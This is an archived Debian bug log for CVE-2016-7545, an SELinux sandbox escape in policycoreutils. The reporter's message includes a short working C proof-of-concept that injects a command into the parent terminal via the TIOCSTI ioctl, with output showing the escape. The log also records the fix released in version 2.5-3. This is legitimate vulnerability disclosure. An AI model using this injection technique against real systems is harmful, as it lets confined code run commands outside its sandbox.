Debian Bug report logs -
#838599
policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl
Reported by: up201407890@alunos.dcc.fc.up.pt
Date: Thu, 22 Sep 2016 19:15:02 UTC
Severity: important
Tags: fixed-upstream, security, sid, stretch, upstream
Found in version policycoreutils/2.3-1
Fixed in version policycoreutils/2.5-3
Done: Laurent Bigonville <bigon@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
:
Bug#838599
; Package policycoreutils
.
(Thu, 22 Sep 2016 19:15:05 GMT) (full text, mbox, link).
Acknowledgement sent
to up201407890@alunos.dcc.fc.up.pt
:
New Bug report received and forwarded. Copy sent to Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
.
(Thu, 22 Sep 2016 19:15:05 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: policycoreutils
Severity: important
Tags: security
Hi,
When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
This is similar to CVE-2016-2568, CVE-2016-2779, etc.
Thanks,
Federico Bento.
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Changed Bug title to 'policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl' from 'policycoreutils SELinux sandbox escape via TIOCSTI ioctl'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org
.
(Sun, 25 Sep 2016 13:27:04 GMT) (full text, mbox, link).
Added tag(s) fixed-upstream and upstream.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org
.
(Sun, 25 Sep 2016 13:27:04 GMT) (full text, mbox, link).
Marked as found in versions policycoreutils/2.3-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org
.
(Sun, 25 Sep 2016 13:27:05 GMT) (full text, mbox, link).
Added tag(s) stretch and sid.
Request was from Laurent Bigonville <bigon@debian.org>
to control@bugs.debian.org
.
(Tue, 27 Sep 2016 11:27:03 GMT) (full text, mbox, link).
Reply sent
to Laurent Bigonville <bigon@debian.org>
:
You have taken responsibility.
(Tue, 27 Sep 2016 22:33:22 GMT) (full text, mbox, link).
Notification sent
to up201407890@alunos.dcc.fc.up.pt
:
Bug acknowledged by developer.
(Tue, 27 Sep 2016 22:33:22 GMT) (full text, mbox, link).
Message #18 received at 838599-close@bugs.debian.org (full text, mbox, reply):
Source: policycoreutils
Source-Version: 2.5-3
We believe that the bug you reported is fixed in the latest version of
policycoreutils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 838599@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Laurent Bigonville <bigon@debian.org> (supplier of updated policycoreutils package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Tue, 27 Sep 2016 22:30:28 +0200
Source: policycoreutils
Binary: policycoreutils policycoreutils-python-utils python-sepolicy policycoreutils-gui policycoreutils-dev policycoreutils-sandbox restorecond mcstrans newrole
Architecture: source amd64 all
Version: 2.5-3
Distribution: unstable
Urgency: medium
Maintainer: Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
Changed-By: Laurent Bigonville <bigon@debian.org>
Description:
mcstrans - SELinux core policy utilities (mcstrans utilities)
newrole - SELinux core policy utilities (newrole application for RBAC/MLS)
policycoreutils - SELinux core policy utilities
policycoreutils-dev - SELinux core policy utilities (development utilities)
policycoreutils-gui - SELinux core policy utilities (graphical utilities)
policycoreutils-python-utils - SELinux core policy utilities (Python utilities)
policycoreutils-sandbox - SELinux core policy utilities (graphical sandboxes)
python-sepolicy - Python binding for SELinux Policy Analyses
restorecond - SELinux core policy utilities (restorecond utilities)
Closes: 836289 838599
Changes:
policycoreutils (2.5-3) unstable; urgency=medium
.
* Team upload.
* d/p/Dont_use_subprocess_getstatusoutput_in_Python_2_code.patch: Make the
python code of chcat and sandbox compatible with both python2 and python3
* debian/NEWS, debian/control: Fix a typo
* Merge Fedora changes to the selinux-autorelabel systemd scripts and units.
We now use a selinux-autorelabel.target and a generator that override the
default.target in case we need to relabel the filesystems.
* debian/patches/sandbox-dbus-run-session.patch: Use dbus-run-session
instead of dbus-launch when available (Closes: #836289)
* debian/patches/CVE-2016-7545.patch: create a new session for sandboxed
processes (Closes: #838599 CVE-2016-7545)
* debian/patches/sandbox-gobject-gtk.patch: Use GTK+ GObject introspection
bindings instead of old pygtk2 ones
* debian/patches/sandbox-x-window-manager.patch: Use system default window
manager instead of openbox
Checksums-Sha1:
ae285b0802ea725bf6fc6cde2ea768b3bbd7ef1a 2640 policycoreutils_2.5-3.dsc
38317a9cab703bd69f4e5bd94fd07d2d46b2f320 31712 policycoreutils_2.5-3.debian.tar.xz
e1593ffeefa65d5bb8c101e527a893d45a080130 54538 mcstrans-dbgsym_2.5-3_amd64.deb
03ce5e25e11ca74bc88b611b7c00cf5cb9bcfc8c 138166 mcstrans_2.5-3_amd64.deb
0e8156745cf3e614266b9d7aa16ca762ccf9e9c3 35652 newrole-dbgsym_2.5-3_amd64.deb
8436a358af1dd2c2b519db553c572efe98f33a27 56282 newrole_2.5-3_amd64.deb
2f9c3bdd421400b02242427002fd4ce801babe15 68646 policycoreutils-dbgsym_2.5-3_amd64.deb
e13a09f59a25b77a537f352043b50e844d1005bb 45322 policycoreutils-dev-dbgsym_2.5-3_amd64.deb
8f6f7ac33925686dbd2665d99d59a1203b85732b 172418 policycoreutils-dev_2.5-3_amd64.deb
5de6243999baf4de4e7af6bde115fbb4b8c66d5a 1579600 policycoreutils-gui_2.5-3_all.deb
d821945cbd4f1a2fd78f145e6b21c199a1ec037e 8196 policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
832680630894beea793a1af0b1a1af769b4fb22a 86480 policycoreutils-python-utils_2.5-3_amd64.deb
9708b357fe5e642e73e2cbd384aba8f288ade318 18000 policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
14fdaddcd17eb363405db1cdbecc464836eabf76 48024 policycoreutils-sandbox_2.5-3_amd64.deb
9d9faa0f41ded0ca2db511dc1d219ba92e815823 481042 policycoreutils_2.5-3_amd64.deb
ac761fa3aa604c65d6cfee3dce59d1dcfb6d4c48 50110 python-sepolicy-dbgsym_2.5-3_amd64.deb
d675417d3c67680b53f7e7d98f76cbf1076b38e5 77164 python-sepolicy_2.5-3_amd64.deb
d71922a7351735f966209c558b92f12dcd3ecdbe 35844 restorecond-dbgsym_2.5-3_amd64.deb
f04c4cbdec8ef369e4d7cf65fd5e730488a048a7 53454 restorecond_2.5-3_amd64.deb
Checksums-Sha256:
7d127648aae91baad997051d62236532ea7d5d0fc9dad7b9bb74400a261c528d 2640 policycoreutils_2.5-3.dsc
72d5fb13a7c1bfd134f2c60da7a3cf0ff62039e8081d8decaaacedd8670613ad 31712 policycoreutils_2.5-3.debian.tar.xz
71ea0140c0813d3b8573aa6b64974ddf5ba8d545cc5e59d7d66fc5f0d7058820 54538 mcstrans-dbgsym_2.5-3_amd64.deb
f9ceaa33fac38cdb81c70088b5392cbb3337769c2d81acb123c97afafea47919 138166 mcstrans_2.5-3_amd64.deb
e199856dab04558904db240d01f13d28cb372e6019a7d10d3afbf568cf35b754 35652 newrole-dbgsym_2.5-3_amd64.deb
d98b62b1fb4226009ca4b37ee0dd487cbc3a718c312d451ff149e4ee7be0465e 56282 newrole_2.5-3_amd64.deb
9fedbbf9336dc1c3cb89a219fdeee0a9ad516fbb4c2f76ead2ae59174cb22c38 68646 policycoreutils-dbgsym_2.5-3_amd64.deb
2bf6434cc9f27facedd7ff15e7f0b27b49f5070cf84afd68b23113a11cdf74b9 45322 policycoreutils-dev-dbgsym_2.5-3_amd64.deb
e0eeae11a15c7e1c8f1d27e2a80a65dc7fb31a0bfe265955e502ae7dcbb1adf3 172418 policycoreutils-dev_2.5-3_amd64.deb
c79e824640d80ac114b18409a42930beec16cef8889949b6144b737cc5476280 1579600 policycoreutils-gui_2.5-3_all.deb
a02f5f6693d74e34ad73b9cd53bf0051eaa9d7509dd85d9f3407580ecad69ce0 8196 policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
1f5114b38aaf3da8bc4d9dafab235b08a7d21c4031b01bc085beb7158729a284 86480 policycoreutils-python-utils_2.5-3_amd64.deb
e5524e01c449c1629fd72a26de00381686d11e248b0f4835a6ede625e98644d3 18000 policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
16d6c8eb0f37022f2483091b023189065a55f9077da59d8785d0b36981f3af49 48024 policycoreutils-sandbox_2.5-3_amd64.deb
bd15f3cd8cee1bf98e49180765f46348fd492417662b3ecce6ad89a456c6c773 481042 policycoreutils_2.5-3_amd64.deb
448e8333927dd49f5cbcd90a940aefde9ba4eaa44d136a8b25b3b6ed7d716812 50110 python-sepolicy-dbgsym_2.5-3_amd64.deb
468b63538d0cf451de92787107081443013979db103f55f5a2917e4de0b86123 77164 python-sepolicy_2.5-3_amd64.deb
7ba9a7d7495c4cc511a140b78f59391974c3188bf24fa8b618a05d28ee7a91d5 35844 restorecond-dbgsym_2.5-3_amd64.deb
269ef7645ec1bfeedbb8d68c0a17d43b2bbb4511d06f6c13cc12e024d83fa769 53454 restorecond_2.5-3_amd64.deb
Files:
a169586adf66bfeec9efa7f7e1b1fef5 2640 utils optional policycoreutils_2.5-3.dsc
bb5cac94e0cd1f41c662993bc1bce659 31712 utils optional policycoreutils_2.5-3.debian.tar.xz
8fe994bcf20635d2de226c57c0a2a7de 54538 debug extra mcstrans-dbgsym_2.5-3_amd64.deb
c222f3faaf07b7e3dc85f68961d7cfa8 138166 utils extra mcstrans_2.5-3_amd64.deb
809bee34f11d34d90d452d8ee487a3b8 35652 debug extra newrole-dbgsym_2.5-3_amd64.deb
37a18c2efcf7d92523f3f2e3ffd9db13 56282 utils extra newrole_2.5-3_amd64.deb
91a4c7f5d231d4f5667d0774ba66cab9 68646 debug extra policycoreutils-dbgsym_2.5-3_amd64.deb
5bcd690625c6b22ebb731ef90ca07320 45322 debug extra policycoreutils-dev-dbgsym_2.5-3_amd64.deb
007864b2af09fe8957be5b76185e9803 172418 devel optional policycoreutils-dev_2.5-3_amd64.deb
6cc7dd3178d89992707aa8e532bbf7ad 1579600 utils extra policycoreutils-gui_2.5-3_all.deb
ce5abf5e26831b670bae781a8f11af1b 8196 debug extra policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
19af2de28b2ca326373fdcd74b396428 86480 utils optional policycoreutils-python-utils_2.5-3_amd64.deb
38f221892e7a4b89ea2a784e7737e38b 18000 debug extra policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
72fcc2c0eba01b5c89c661b88ce51aca 48024 utils extra policycoreutils-sandbox_2.5-3_amd64.deb
5f09f38d9853b58c11fc6365846d7f2f 481042 utils optional policycoreutils_2.5-3_amd64.deb
913506db1502c502c1eb05a8e212ddab 50110 debug extra python-sepolicy-dbgsym_2.5-3_amd64.deb
1e57df4669f3d593468bed4fb6117bf0 77164 python optional python-sepolicy_2.5-3_amd64.deb
81bc1d51cdfabeed16055f35610486b7 35844 debug extra restorecond-dbgsym_2.5-3_amd64.deb
4b321a779b4e1a154e34d69aa9f98ade 53454 utils optional restorecond_2.5-3_amd64.deb
-----BEGIN PGP SIGNATURE-----
iQEuBAEBCAAYBQJX6tiCERxiaWdvbkBkZWJpYW4ub3JnAAoJEB/FiR66sEPVBDQH
/3gaOxK3lDbCYgX7JUfFyFVyKnYqbeU3kG+cCrLGlhJRm/5CECoycClrsNM4D19C
5S0fRWh9UK/j7Y/KCYsF94clYds+8labm6O+i5hm9RaxL0+beqdTzQ+OO9njWpnu
j2+OiROJVZFVp+vUhFseIORhEGGnhIyzK/otBxJxxFo+czkIrRj6fwYlMKSBNFeG
hbkzVNk1HhIqWPOD0v2RukWQTK0HpCj4sh7sFHzgxAvtzm7W++HJv6n4QnMahnjh
GjsFHrejKeFgpNwcKAcDDKAPmwQybKSVIGtKiNEA+vkd0G7v3MFPg1gF1bujyHj/
mGAt4HCJ0rzJWJso4BU0SFM=
=gQQn
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org
.
(Mon, 31 Oct 2016 07:31:14 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 13:50:34 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.